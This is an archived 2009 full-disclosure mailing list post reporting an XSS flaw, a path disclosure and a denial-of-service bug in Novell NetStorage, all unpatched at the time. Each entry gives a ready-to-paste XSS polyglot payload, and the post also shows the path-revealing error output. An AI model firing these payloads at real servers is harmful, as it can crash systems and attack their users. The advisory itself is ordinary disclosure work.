lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <63ac005e0903261750o113ecbd2k561c892552abe2f8@mail.gmail.com>
Date: Thu, 26 Mar 2009 18:50:24 -0600
From: Bugs NotHugs <bugsnothugs@...il.com>
To: bugtraq <bugtraq@...urityfocus.com>, fd <full-disclosure@...ts.grok.org.uk>
Subject: Novell Netstorage Multiple Vulnerabilities

- Novell Netstorage Multiple Vulnerabilities

- Description

"Novell NetStorage acts as a bridge between a company's protected Novell network
and the Internet, providing protected file access from any Internet
location. Files
and folders on a Novell NetWare® 6.5 server or Novell Open Enterprise
Server can be
accessed using either a browser or via Network Neighborhood and Microsoft Web
Folders; no Novell Client^Ù software is required. Users can securely
access files
from any IP-enabled machine via Secure Sockets Layer (SSL) and Secure Hypertext
Transfer Protocol (HTTPS)."

Novell NetStorage contains a wide variety of vulnerabilities that may
allow an attacker
to cause a denial of service, gain configuration information or exploit other
users of the application.

#1 - Filter Field XSS

The 'filter' field does not sanitize user-supplied input. An attacker
could use this
to carry out cross-site scripting attacks against other authenticated users.

 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#2 - Mail File Action Path Disclosure

On a file list, if a user right clicks a file, chooses the 'mail'
option and then
pastes script code in any field, the application will produce an error message
disclosing the installation path:

  Paste the following script:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

  Resulting error:

  OES:
    'file:/var/opt/novell/novlwww/email.xsl': (1): mismatched end tag:
expected "to" but got "SCRIPT"

  Netware:
    'file:/SYS:/tomcat/4/email.xsl': (1): mismatched end tag: expected
"subject" but got "SCRIPT"

#3 - File Attribute Malformed Input Server DoS

When interacting with files, a user can right click on the file and click
either 'NFS Info' or 'Netware Info'. Supplying script code into various fields
will cause the Netware server to abend and lock up.

Note: This was only tested on version 2.0.1 on netware 6.5 SP6, not OES.

The following script code causes the issue:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

- Product

Novell Inc., Netstorage, 3.1.5-19 on OES - 2.0.1 on netware 6.5 SP6

- Solution

None

- Timeline

2008-06-06: Vulnerability Discovered
2008-07-07: Disclosed to Vendor (no ack)
2008-10-05: Re-sent to Vendor (no ack)
2009-03-26: Disclosed to Public (no more playing nice)

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ